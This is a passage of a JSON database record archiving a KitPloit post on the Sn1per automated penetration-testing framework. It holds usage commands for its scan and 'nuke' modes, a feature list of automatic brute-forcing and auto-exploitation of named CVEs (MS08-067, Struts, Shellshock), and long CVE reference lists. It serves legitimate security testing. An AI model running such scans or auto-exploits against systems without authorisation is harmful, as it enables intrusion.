<TARGET> -m port -p|--port <portnum>\n \n [*] FULLPORTONLY SCAN MODE\n sniper -t|--target <TARGET> -fp|--fullportonly\n \n [*] PORT SCAN MODE\n sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>\n \n [*] WEB MODE - PORT 80 + 443 ONLY!\n sniper -t|--target <TARGET> -m|--mode web\n \n [*] HTTP WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>\n \n [*] HTTPS WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>\n \n [*] ENABLE BRUTEFORCE\n sniper -t|--target <TARGET> -b|--bruteforce\n \n [*] AIRSTRIKE MODE\n sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike\n \n [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED\n sniper -f--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>\n \n [*] ENABLE LOOT IMPORTING INTO METASPLOIT\n sniper -t|--target <TARGET>\n \n [*] LOOT REIMPORT FUNCTION\n sniper -w <WORKSPACE_ALIAS> --reimport\n \n [*] UPDATE SNIPER\n sniper -u|--update\n\n \n** MODES: ** \n\n\n * ** NORMAL: ** Performs basic scan of targets and open ports using both active and passive checks for optimal performance. \n * ** STEALTH: ** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking. \n * ** AIRSTRIKE: ** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning. \n * ** NUKE: ** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke. \n * ** DISCOVER: ** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans. \n * ** PORT: ** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode. \n * ** FULLPORTONLY: ** Performs a full detailed port scan and saves results to XML. \n * ** WEB: ** Adds full automatic web application scans to the results (port 80/tcp &amp; 443/tcp only). Ideal for web applications but may increase scan time significantly. \n * ** WEBPORTHTTP: ** Launches a full HTTP web application scan against a specific host and port. \n * ** WEBPORTHTTPS: ** Launches a full HTTPS web application scan against a specific host and port. \n * ** UPDATE: ** Checks for updates and upgrades all components used by sniper. \n * ** REIMPORT: ** Reimport all workspace files into Metasploit and reproduce all reports. \n * ** RELOAD: ** Reload the master workspace report. \n \n** SAMPLE REPORT: ** \n[ https://gist.github.com/1N3/8214ec2da2c91691bcbc ](<https://gist.github.com/1N3/8214ec2da2c91691bcbc>) \n \n \n\n\n** [ Download Sn1per v5.0 ](<https://github.com/1N3/Sn1per>) **\n", "edition": 12, "enchantments": {"dependencies": {"modified": "2020-02-25T04:38:00", "references": [{"idList": ["PACKETSTORM:144050", "PACKETSTORM:147392", "PACKETSTORM:86448", "PACKETSTORM:144034"], "type": "packetstorm"}, {"idList": ["KITPLOIT:8800200070735873517", "KITPLOIT:2304674796555328667", "KITPLOIT:7942195329946074809", "KITPLOIT:1841841790447853746", "KITPLOIT:9079806502812490909", "KITPLOIT:7013881512724945934", "KITPLOIT:7835941952769002973"], "type": "kitploit"}, {"idList": ["ICSA-15-344-01"], "type": "ics"}, {"idList": ["MYHACK58:62201784026", "MYHACK58:62201789104"], "type": "myhack58"}, {"idList": ["TRENDMICROBLOG:2E02CB122DC8C3DB57EF3830829E9913"], "type": "trendmicroblog"}, {"idList": ["THN:460709FF530ED7F35B5817A55F1BF2C6", "THN:89C2482FECD181DD37C6DAEEB7A66FA9", "THN:3F47D7B66C8A65AB31FAC5823C96C34D", "THN:6C0E5E35ABB362C8EA341381B3DD76D6"], "type": "thn"}, {"idList": ["EDB-ID:1997", "EDB-ID:42627"], "type": "exploitdb"}, {"idList": ["SECURITYVULNS:DOC:30472", "SECURITYVULNS:DOC:22818", "SECURITYVULNS:DOC:31102", "SECURITYVULNS:DOC:22821", "SECURITYVULNS:VULN:10414", "SECURITYVULNS:DOC:31103"], "type": "securityvulns"}, {"idList": ["CFOUNDRY:C2B8B89ADB85BB41095EAA7D88C0E350", "CFOUNDRY:51A1D2F1D196381CC46CAE44EB5F5940", "CFOUNDRY:3B3A927B1B8E5A80A8EA38A6AACF98EE", "CFOUNDRY:13948A26B0F4A736B03310A8560A6F73"], "type": "cloudfoundry"}, {"idList": ["CVE-2018-7600", "CVE-2006-3392", "CVE-2009-3843", "CVE-2018-10561", "CVE-2017-5638", "CVE-2014-0160", "CVE-2017-9805", "CVE-2014-6271"], "type": "cve"}, {"idList": ["ATLASSIAN:CWD-4879", "ATLASSIAN:BAM-18242"], "type": "atlassian"}, {"idList": ["GLSA-200608-11"], "type": "gentoo"}, {"idList": ["VU:999601", "VU:112992"], "type": "cert"}, {"idList": ["TALOSBLOG:DAD87115458AF1FB5EDF5A2BB21D8AB9", "TALOSBLOG:DB8F26399F12B0F9B9309365CB42D9BB"], "type": "talosblog"}, {"idList": ["1337DAY-ID-30199", "1337DAY-ID-28454", "1337DAY-ID-28445"], "type": "zdt"}, {"idList": ["NMAP:HTTP-VULN-CVE2006-3392.NSE"], "type": "nmap"}, {"idList": ["OPENVAS:57861", "OPENVAS:57067", "OPENVAS:1361412562310811730"], "type": "openvas"}, {"idList": ["RAPID7COMMUNITY:078B46BBA3057CDE37845D48479CC3DD"], "type": "rapid7community"}, {"idList": ["SSV:92804", "SSV:92746", "SSV:97207", "SSV:96420", "SSV:14974"], "type": "seebug"}, {"idList": ["IMPERVABLOG:6BF557CA0830C9058E2409E8C914366C", "IMPERVABLOG:9AF395FCAE299375F787DBC7B797E713", "IMPERVABLOG:C40BB28F51D206C8BB23721D1ECED353", "IMPERVABLOG:81785CACF2722C5387530DCFDE54E6E4", "IMPERVABLOG:38007E943B20A50B729BC17911999C11", "IMPERVABLOG:D4ED0576717DBEEDCF6B9B98BADC92BD"], "type": "impervablog"}, {"idList": ["PENTESTIT:37744BAB82BC3A7B208CCD4945FA50F7"], "type": "pentestit"}, {"idList": ["GENTOO_GLSA-200608-11.NASL", "USERMIN_1220_INFO_DISCLOSURE.NASL", "STRUTS_2_5_13_REST_RCE.NASL", "FREEBSD_PKG_A9E466E8414411E8A29200E04C1EA73D.NASL", "WEBMIN_1290.NASL", "FREEBSD_PKG_227475C209CB11DB9156000E0C2E438A.NASL"], "type": "nessus"}, {"idList": ["PAN-SA-2014-0004"], "type": "paloalto"}, {"idList": ["SAINT:88789BF22A82B3B79355F9F1C375C644", "SAINT:E218D6FA073276BB012BADF2CCE50F0E", "SAINT:94DD62E7D4C2602EDF0704F85789EDD0", "SAINT:5DF2E8BB0ECF29725510E3173971EDE5", "SAINT:1AF820E0642E7888070E0C7DD723BBAE", "SAINT:49062325B1FAB54D731E4C8FBF78D940"], "type": "saint"}, {"idList": ["GHSA-GG9M-FJ3V-R58C"], "type": "github"}, {"idList": ["SMNTC-70103"], "type": "symantec"}, {"idList": ["A9E466E8-4144-11E8-A292-00E04C1EA73D"], "type": "freebsd"}, {"idList": ["ZDI-09-085"], "type": "zdi"}, {"idList": ["THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "THREATPOST:3D545239C6AE58821904FBF3069CB365", "THREATPOST:477B6029652B76463B5C5B7155CDF736"], "type": "threatpost"}, {"idList": ["F5:K15159", "F5:K84144321", "F5:K22854260", "SOL15159", "F5:K43451236"], "type": "f5"}, {"idList": ["E-643"], "type": "dsquare"}, {"idList": ["H1:32570"], "type": "hackerone"}, {"idList": ["MSF:AUXILIARY/ADMIN/WEBMIN/FILE_DISCLOSURE", "MSF:EXPLOIT/MULTI/HTTP/STRUTS2_REST_XSTREAM"], "type": "metasploit"}, {"idList": ["DEBIAN:DLA-1325-1:E895C"], "type": "debian"}, {"idList": ["OPENSSL:CVE-2014-0160"], "type": "openssl"}, {"idList": ["OSVDB:26772"], "type": "osvdb"}]}, "score": {"modified": "2020-02-25T04:38:00", "value": 7.1, "vector": "NONE"}}, "hash": "6c83012ee3ad36aedf9accb7b85428608f2ecd7f6d91282743edd6aaba15a7fe", "hashmap": [{"hash": "41cf64167afe5858b5f643ae278109ca", "key": "published"}, {"hash": "48ff728472335fc1adde286a415655a6", "key": "references"}, {"hash": "aba454e3574969396c0dddcb45011dcc", "key": "reporter"}, {"hash": "b91d75eb0060970d0a67a3d04b19db68", "key": "cvelist"}, {"hash": "156b5913dcc72ba0ca7e1f3b8aa72160", "key": "title"}, {"hash": "edfca85c4c320ffaa9dcfdcb6a20ce1d", "key": "cvss"}, {"hash": "4a931512ce65bdc9ca6808adf92d8783", "key": "bulletinFamily"}, {"hash": "4553be2119d862322dd6fec6bb385401", "key": "type"}, {"hash": "8ffa366cbd9d8b2265aeb64b6500604e", "key": "toolHref"}, {"hash": "0850c3f2e8d5b0e199adc0da59e44c2f", "key": "href"}, {"hash": "77fa4edd351d89b8a22c92e8bc699f5b", "key": "description"}, {"hash": "41cf64167afe5858b5f643ae278109ca", "key": "modified"}], "history": [], "href": "http://www.kitploit.com/2018/11/sn1per-v60-automated-pentest-framework.html", "id": "KITPLOIT:8672599587089685905", "lastseen": "2020-02-25T04:38:00", "modified": "2018-11-24T12:43:00", "objectVersion": "1.3", "published": "2018-11-24T12:43:00", "references": ["https://gist.github.com/1N3/8214ec2da2c91691bcbc", "https://github.com/menzow/sn1per-docker", "https://github.com/1N3/Sn1per"], "reporter": "KitPloit", "title": "Sn1per v6.0 - Automated Pentest Framework For Offensive Security Experts", "toolHref": "https://github.com/1N3/Sn1per", "type": "kitploit", "viewCount": 506}, "differentElements": ["cvelist"], "edition": 12, "lastseen": "2020-02-25T04:38:00"}, {"bulletin": {"bulletinFamily": "tools", "cvelist": ["CVE-2018-7600", "CVE-2006-3392", "CVE-2009-3843", "CVE-2018-10561", "CVE-2017-5638", "CVE-2014-0160", "CVE-2017-9805", "CVE-2019-0708", "CVE-2014-6271"], "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "description": "[  ](<https://4.bp.blogspot.com/-P3_9VWnPhLw/WzvPRBF6q3I/AAAAAAAALtk/nE4XtcDGmXELo4KLTzEDoCiNMEgF0VJAACLcBGAs/s1600/Sn1per_1_Sn1per.jpeg>)\n\n \n\n\nSn1per Community Edition is an [ automated scanner ](<https://www.kitploit.com/search/label/Automated%20scanner>) that can be used during a [ penetration test ](<https://www.kitploit.com/search/label/Penetration%20Test>) to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes. \n\n \n** SN1PER PROFESSIONAL FEATURES: ** \n \n** Professional reporting interface ** \n \n\n\n[  ](<https://3.bp.blogspot.com/-CUaHGxKs7i8/WzvPDvnvnUI/AAAAAAAALtg/6NzvIUFvET0YO8X9SXkxbSXD51R9dgn_QCLcBGAs/s1600/Sn1per_8.png>)\n\n \n** Slideshow for all gathered screenshots ** \n \n\n\n[  ](<https://3.bp.blogspot.com/-ElnqBSUrveU/WzvPZw0s4FI/AAAAAAAALto/xOUximDoNkMni5XhkzmMDnI9caTUWdo3gCLcBGAs/s1600/Sn1per_9.png>)\n\n \n** Searchable and sortable DNS, IP and open port database ** \n \n\n\n[  ](<https://3.bp.blogspot.com/-U5MHC2iK1ag/WzvPfoIz6nI/AAAAAAAALts/m-GOz4roSSEhYjSeZgakgEJxo4-xCSlIQCLcBGAs/s1600/Sn1per_10.png>)\n\n \n \n** Categorized host reports ** \n \n\n\n[  ](<https://4.bp.blogspot.com/-b82btbNLylE/WzvPj6ds37I/AAAAAAAALt0/KgxDw1g6rCgCuDamA3v_GBIHTAs-No2DwCLcBGAs/s1600/Sn1per_11.png>)\n\n \n \n** Quick links to online recon tools and Google hacking queries ** \n \n\n\n[  ](<https://4.bp.blogspot.com/-eB0eLBg1-Xs/WzvPsgtbmGI/AAAAAAAALt8/FSkOuUJlOb0YXRetzL4TYbuLeOmRaQtOwCLcBGAs/s1600/Sn1per_12.png>)\n\n \n** Personalized notes field for each host ** \n \n\n\n[  ](<https://1.bp.blogspot.com/-4SndSkZX88U/WzvPxUain4I/AAAAAAAALuE/x7ZucGGcTPIOGerWwlbWvXrFVosouiOhwCLcBGAs/s1600/Sn1per_13.png>)\n\n \n \n** DEMO VIDEO: ** \n[  ](<https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm>) \n \n** SN1PER COMMUNITY FEATURES: ** \n\n\n * * Automatically collects basic recon (ie. whois, ping, DNS, etc.) \n * Automatically launches Google hacking queries against a target domain \n * Automatically enumerates open ports via NMap port scanning \n * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers \n * Automatically checks for sub-domain hijacking \n * Automatically runs targeted NMap scripts against open ports \n * Automatically runs targeted Metasploit scan and exploit modules \n * Automatically scans all web applications for common vulnerabilities \n * Automatically brute forces ALL open services \n * Automatically test for anonymous FTP access \n * Automatically runs WPScan, Arachni and Nikto for all web services \n * Automatically enumerates NFS shares \n * Automatically test for anonymous LDAP access \n * Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities \n * Automatically enumerate SNMP community strings, services and users \n * Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067 \n * Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers \n * Automatically tests for open X11 servers \n * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds \n * Performs high level enumeration of multiple hosts and subnets \n * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting \n * Automatically gathers screenshots of all web sites \n * Create individual workspaces to store all scan output \n \n** AUTO-PWN: ** \n\n\n * Drupal Drupalgedon2 RCE CVE-2018-7600 \n * GPON Router RCE CVE-2018-10561 \n * [ Apache Struts ](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 RCE CVE-2017-5638 \n * Apache Struts 2 RCE CVE-2017-9805 \n * Apache Jakarta RCE CVE-2017-5638 \n * Shellshock GNU Bash RCE CVE-2014-6271 \n * HeartBleed OpenSSL Detection CVE-2014-0160 \n * Default Apache Tomcat Creds CVE-2009-3843 \n * MS Windows SMB RCE MS08-067 \n * Webmin File Disclosure CVE-2006-3392 \n * [ Anonymous FTP ](<https://www.kitploit.com/search/label/Anonymous%20FTP>) Access \n * PHPMyAdmin Backdoor RCE \n * PHPMyAdmin Auth Bypass \n * JBoss Java De-Serialization RCE's \n \n** KALI LINUX INSTALL: ** \n\n \n \n ./install.sh\n\n \n** DOCKER INSTALL: ** \nCredits: @menzow \nDocker Install: [ https://github.com/menzow/sn1per-docker ](<https://github.com/menzow/sn1per-docker>) \nDocker Build: [ https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/ ](<https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/>) \nExample usage: \n\n \n \n $ docker pull menzo/sn1per-docker\n $ docker run --rm -ti menzo/sn1per-docker sniper menzo.io\n\n \n** USAGE: ** \n\n \n \n [*] NORMAL MODE\n sniper -t|--target <TARGET>\n \n [*] NORMAL MODE + OSINT + RECON\n sniper -t|--target <TARGET> -o|--osint -re|--recon\n \n [*] STEALTH MODE + OSINT + RECON\n sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon\n \n [*] DISCOVER MODE\n sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORSPACE_ALIAS>\n \n [*] SCAN ONLY SPECIFIC PORT\n sniper -t|--target <TARGET> -m port -p|--port <portnum>\n \n [*] FULLPORTONLY SCAN MODE\n sniper -t|--target <TARGET> -fp|--fullportonly\n \n [*] PORT SCAN MODE\n sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>\n \n [*] WEB MODE - PORT 80 + 443 ONLY!\n sniper -t|--target <TARGET> -m|--mode web\n \n [*] HTTP WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>\n \n [*] HTTPS WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>\n \n [*] ENABLE BRUTEFORCE\n sniper -t|--target <TARGET> -b|--bruteforce\n \n [*] AIRSTRIKE MODE\n sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike\n \n [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED\n sniper -f--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>\n \n [*] ENABLE LOOT IMPORTING INTO METASPLOIT\n sniper -t|--target <TARGET>\n \n [*] LOOT REIMPORT FUNCTION\n sniper -w <WORKSPACE_ALIAS> --reimport\n \n [*] UPDATE SNIPER\n sniper -u|--update\n\n \n** MODES: ** \n\n\n * ** NORMAL: ** Performs basic scan of targets and open ports using both active and passive checks for optimal performance. \n * ** STEALTH: ** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking. \n * ** AIRSTRIKE: ** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning. \n * ** NUKE: ** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke. \n * ** DISCOVER: ** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans. \n * ** PORT: ** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode. \n * ** FULLPORTONLY: ** Performs a full detailed port scan and saves results to XML. \n * ** WEB: ** Adds full automatic web application scans to the results (port 80/tcp &amp; 443/tcp only). Ideal for web applications but may increase scan time significantly. \n * ** WEBPORTHTTP: ** Launches a full HTTP web application scan against a specific host and port. \n * ** WEBPORTHTTPS: ** Launches a full HTTPS web application scan against a specific host and port. \n * ** UPDATE: ** Checks for updates and upgrades all components used by sniper. \n * ** REIMPORT: ** Reimport all workspace files into Metasploit and reproduce all reports. \n * ** RELOAD: ** Reload the master workspace report. \n \n** SAMPLE REPORT: ** \n[ https://gist.github.com/1N3/8214ec2da2c91691bcbc ](<https://gist.github.com/1N3/8214ec2da2c91691bcbc>) \n \n \n\n\n** [ Download Sn1per v5.0 ](<https://github.com/1N3/Sn1per>) **\n", "edition": 5, "enchantments": {"dependencies": {"modified": "2019-06-21T09:57:19", "references": [{"idList": ["VU:999601"], "type": "cert"}, {"idList": ["MSF:AUXILIARY/ADMIN/WEBMIN/FILE_DISCLOSURE", "MSF:AUXILIARY/SCANNER/RDP/CVE_2019_0708_BLUEKEEP"], "type": "metasploit"}, {"idList": ["ICSA-15-344-01"], "type": "ics"}, {"idList": ["THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "THREATPOST:FC5665486C9D63E5C0C242F47F66ACF1", "THREATPOST:477B6029652B76463B5C5B7155CDF736"], "type": "threatpost"}, {"idList": ["TRENDMICROBLOG:2E02CB122DC8C3DB57EF3830829E9913"], "type": "trendmicroblog"}, {"idList": ["SECURITYVULNS:DOC:30472", "SECURITYVULNS:DOC:22818", "SECURITYVULNS:DOC:31102", "SECURITYVULNS:DOC:22821", "SECURITYVULNS:VULN:10414", "SECURITYVULNS:DOC:31103"], "type": "securityvulns"}, {"idList": ["SMNTC-108273", "SMNTC-70103"], "type": "symantec"}, {"idList": ["CFOUNDRY:C2B8B89ADB85BB41095EAA7D88C0E350", "CFOUNDRY:51A1D2F1D196381CC46CAE44EB5F5940", "CFOUNDRY:3B3A927B1B8E5A80A8EA38A6AACF98EE", "CFOUNDRY:13948A26B0F4A736B03310A8560A6F73"], "type": "cloudfoundry"}, {"idList": ["THN:89C2482FECD181DD37C6DAEEB7A66FA9", "THN:3F47D7B66C8A65AB31FAC5823C96C34D", "THN:6C0E5E35ABB362C8EA341381B3DD76D6"], "type": "thn"}, {"idList": ["ATLASSIAN:CWD-4879", "ATLASSIAN:BAM-18242"], "type": "atlassian"}, {"idList": ["GLSA-200608-11"], "type": "gentoo"}, {"idList": ["EDB-ID:1997"], "type": "exploitdb"}, {"idList": ["TALOSBLOG:DAD87115458AF1FB5EDF5A2BB21D8AB9", "TALOSBLOG:DB8F26399F12B0F9B9309365CB42D9BB"], "type": "talosblog"}, {"idList": ["NMAP:HTTP-VULN-CVE2006-3392.NSE"], "type": "nmap"}, {"idList": ["OPENVAS:57861", "OPENVAS:57067", "OPENVAS:1361412562310811730"], "type": "openvas"}, {"idList": ["RAPID7COMMUNITY:078B46BBA3057CDE37845D48479CC3DD"], "type": "rapid7community"}, {"idList": ["IMPERVABLOG:6BF557CA0830C9058E2409E8C914366C", "IMPERVABLOG:9AF395FCAE299375F787DBC7B797E713", "IMPERVABLOG:C40BB28F51D206C8BB23721D1ECED353", "IMPERVABLOG:38007E943B20A50B729BC17911999C11", "IMPERVABLOG:D4ED0576717DBEEDCF6B9B98BADC92BD"], "type": "impervablog"}, {"idList": ["SSV:92804", "SSV:92746", "SSV:97207", "SSV:96420", "SSV:14974"], "type": "seebug"}, {"idList": ["PACKETSTORM:144050", "PACKETSTORM:86448", "PACKETSTORM:144034"], "type": "packetstorm"}, {"idList": ["PENTESTIT:37744BAB82BC3A7B208CCD4945FA50F7"], "type": "pentestit"}, {"idList": ["PAN-SA-2014-0004"], "type": "paloalto"}, {"idList": ["MSRC:6A6ED6A5B652378DCBA3113B064E973B"], "type": "msrc"}, {"idList": ["SAINT:88789BF22A82B3B79355F9F1C375C644", "SAINT:94DD62E7D4C2602EDF0704F85789EDD0", "SAINT:5DF2E8BB0ECF29725510E3173971EDE5", "SAINT:49062325B1FAB54D731E4C8FBF78D940"], "type": "saint"}, {"idList": ["ZDI-09-085"], "type": "zdi"}, {"idList": ["F5:K15159", "F5:K84144321", "F5:K22854260", "SOL15159", "F5:K25238311", "F5:K43451236"], "type": "f5"}, {"idList": ["CVE-2018-7600", "CVE-2006-3392", "CVE-2009-3843", "CVE-2018-10561", "CVE-2017-5638", "CVE-2014-0160", "CVE-2017-9805", "CVE-2019-0708", "CVE-2014-6271"], "type": "cve"}, {"idList": ["KITPLOIT:4583746754784092967", "KITPLOIT:8800200070735873517", "KITPLOIT:2304674796555328667", "KITPLOIT:7942195329946074809", "KITPLOIT:998955151150716619", "KITPLOIT:1841841790447853746", "KITPLOIT:9079806502812490909", "KITPLOIT:8661324951126484733", "KITPLOIT:7013881512724945934", "KITPLOIT:7835941952769002973"], "type": "kitploit"}, {"idList": ["H1:32570"], "type": "hackerone"}, {"idList": ["MYHACK58:62201994152", "MYHACK58:62201994259", "MYHACK58:62201994154", "MYHACK58:62201784026", "MYHACK58:62201994234", "MYHACK58:62201994153", "MYHACK58:62201994162"], "type": "myhack58"}, {"idList": ["1337DAY-ID-28445"], "type": "zdt"}, {"idList": ["GENTOO_GLSA-200608-11.NASL", "USERMIN_1220_INFO_DISCLOSURE.NASL", "MANDRAKE_MDKSA-2006-125.NASL", "WEBMIN_1290.NASL", "FREEBSD_PKG_227475C209CB11DB9156000E0C2E438A.NASL"], "type": "nessus"}, {"idList": ["OPENSSL:CVE-2014-0160"], "type": "openssl"}, {"idList": ["OSVDB:26772"], "type": "osvdb"}]}, "score": {"modified": "2019-06-21T09:57:19", "value": 7.3, "vector": "NONE"}}, "hash": "07bfe9edee6d441b2b712cb77d6164b51e7e33784cb1a51571197c74549d1f37", "hashmap": [{"hash": "41cf64167afe5858b5f643ae278109ca", "key": "published"}, {"hash": "48ff728472335fc1adde286a415655a6", "key": "references"}, {"hash": "aba454e3574969396c0dddcb45011dcc", "key": "reporter"}, {"hash": "156b5913dcc72ba0ca7e1f3b8aa72160", "key": "title"}, {"hash": "edfca85c4c320ffaa9dcfdcb6a20ce1d", "key": "cvss"}, {"hash": "4a931512ce65bdc9ca6808adf92d8783", "key": "bulletinFamily"}, {"hash": "4553be2119d862322dd6fec6bb385401", "key": "type"}, {"hash": "8ffa366cbd9d8b2265aeb64b6500604e", "key": "toolHref"}, {"hash": "0850c3f2e8d5b0e199adc0da59e44c2f", "key": "href"}, {"hash": "77fa4edd351d89b8a22c92e8bc699f5b", "key": "description"}, {"hash": "41cf64167afe5858b5f643ae278109ca", "key": "modified"}, {"hash": "c71f1e4fd2c0de085453c6ad55489112", "key": "cvelist"}], "history": [], "href": "http://www.kitploit.com/2018/11/sn1per-v60-automated-pentest-framework.html", "id": "KITPLOIT:8672599587089685905", "lastseen": "2019-06-26T06:10:07", "modified": "2018-11-24T12:43:00", "objectVersion": "1.3", "published": "2018-11-24T12:43:00", "references": ["https://gist.github.com/1N3/8214ec2da2c91691bcbc", "https://github.com/menzow/sn1per-docker", "https://github.com/1N3/Sn1per"], "reporter": "KitPloit", "title": "Sn1per v6.0 - Automated Pentest Framework For Offensive Security Experts", "toolHref": "https://github.com/1N3/Sn1per", "type": "kitploit", "viewCount": 206}, "differentElements": ["cvelist"], "edition": 5, "lastseen": "2019-06-26T06:10:07"}], "edition": 14, "hashmap": [{"key": "bulletinFamily", "hash": "4a931512ce65bdc9ca6808adf92d8783"}, {"key": "cvelist", "hash": "b91d75eb0060970d0a67a3d04b19db68"}, {"key": "cvss", "hash": "edfca85c4c320ffaa9dcfdcb6a20ce1d"}, {"key": "description", "hash": "77fa4edd351d89b8a22c92e8bc699f5b"}, {"key": "href", "hash": "0850c3f2e8d5b0e199adc0da59e44c2f"}, {"key": "modified", "hash": "41cf64167afe5858b5f643ae278109ca"}, {"key": "published", "hash": "41cf64167afe5858b5f643ae278109ca"}, {"key": "references", "hash": "48ff728472335fc1adde286a415655a6"}, {"key": "reporter", "hash": "aba454e3574969396c0dddcb45011dcc"}, {"key": "title", "hash": "156b5913dcc72ba0ca7e1f3b8aa72160"}, {"key": "toolHref", "hash": "8ffa366cbd9d8b2265aeb64b6500604e"}, {"key": "type", "hash": "4553be2119d862322dd6fec6bb385401"}], "hash": "6c83012ee3ad36aedf9accb7b85428608f2ecd7f6d91282743edd6aaba15a7fe", "viewCount": 552, "enchantments": {"dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:8800200070735873517", "KITPLOIT:7013881512724945934", "KITPLOIT:9079806502812490909", "KITPLOIT:2304674796555328667", "KITPLOIT:1841841790447853746", "KITPLOIT:7942195329946074809", "KITPLOIT:7835941952769002973"]}, {"type": "cve", "idList": ["CVE-2018-10561", "CVE-2018-7600", "CVE-2017-9805", "CVE-2006-3392", "CVE-2014-0160", "CVE-2014-6271", "CVE-2017-5638", "CVE-2009-3843"]}, {"type": "f5", "idList": ["F5:K15159", "F5:K43451236", "SOL15159", "F5:K84144321", "F5:K22854260"]}, {"type": "seebug", "idList": ["SSV:92804", "SSV:96420", "SSV:92746", "SSV:97207", "SSV:14974"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:51A1D2F1D196381CC46CAE44EB5F5940", "CFOUNDRY:C2B8B89ADB85BB41095EAA7D88C0E350", "CFOUNDRY:3B3A927B1B8E5A80A8EA38A6AACF98EE", "CFOUNDRY:13948A26B0F4A736B03310A8560A6F73"]}, {"type": "openssl", "idList": ["OPENSSL:CVE-2014-0160"]}, {"type": "atlassian", "idList": ["ATLASSIAN:BAM-18242", "ATLASSIAN:CWD-4879"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:078B46BBA3057CDE37845D48479CC3DD"]}, {"type": "pentestit", "idList": ["PENTESTIT:37744BAB82BC3A7B208CCD4945FA50F7"]}, {"type": "symantec", "idList": ["SMNTC-70103"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22818", "SECURITYVULNS:VULN:10414", "SECURITYVULNS:DOC:22821", "SECURITYVULNS:DOC:30472", "SECURITYVULNS:DOC:31102", "SECURITYVULNS:DOC:31103"]}, {"type": "threatpost", "idList": ["THREATPOST:AD5395CA5B3FD95FAD8E67B675D0AFCA", "THREATPOST:FC5665486C9D63E5C0C242F47F66ACF1", "THREATPOST:477B6029652B76463B5C5B7155CDF736", "THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:9AF395FCAE299375F787DBC7B797E713", "IMPERVABLOG:C40BB28F51D206C8BB23721D1ECED353", "IMPERVABLOG:81785CACF2722C5387530DCFDE54E6E4", "IMPERVABLOG:6BF557CA0830C9058E2409E8C914366C", "IMPERVABLOG:D4ED0576717DBEEDCF6B9B98BADC92BD", "IMPERVABLOG:38007E943B20A50B729BC17911999C11"]}, {"type": "talosblog", "idList": ["TALOSBLOG:DAD87115458AF1FB5EDF5A2BB21D8AB9", "TALOSBLOG:DB8F26399F12B0F9B9309365CB42D9BB"]}, {"type": "thn", "idList": ["THN:3F47D7B66C8A65AB31FAC5823C96C34D", "THN:89C2482FECD181DD37C6DAEEB7A66FA9", "THN:6C0E5E35ABB362C8EA341381B3DD76D6"]}, {"type": "paloalto", "idList": ["PAN-SA-2014-0004"]}, {"type": "myhack58", "idList": ["MYHACK58:62201784379", "MYHACK58:62201789104", "MYHACK58:62201786819", "MYHACK58:62201784026", "MYHACK58:62201784086"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:C890361C9DA2FA0264352384567E504E", "EXPLOITPACK:DEBBBD9CB5D7CBBF28AAD15BB9949E3A"]}, {"type": "hackerone", "idList": ["H1:32570"]}, {"type": "exploitdb", "idList": ["EDB-ID:1997"]}, {"type": "nessus", "idList": 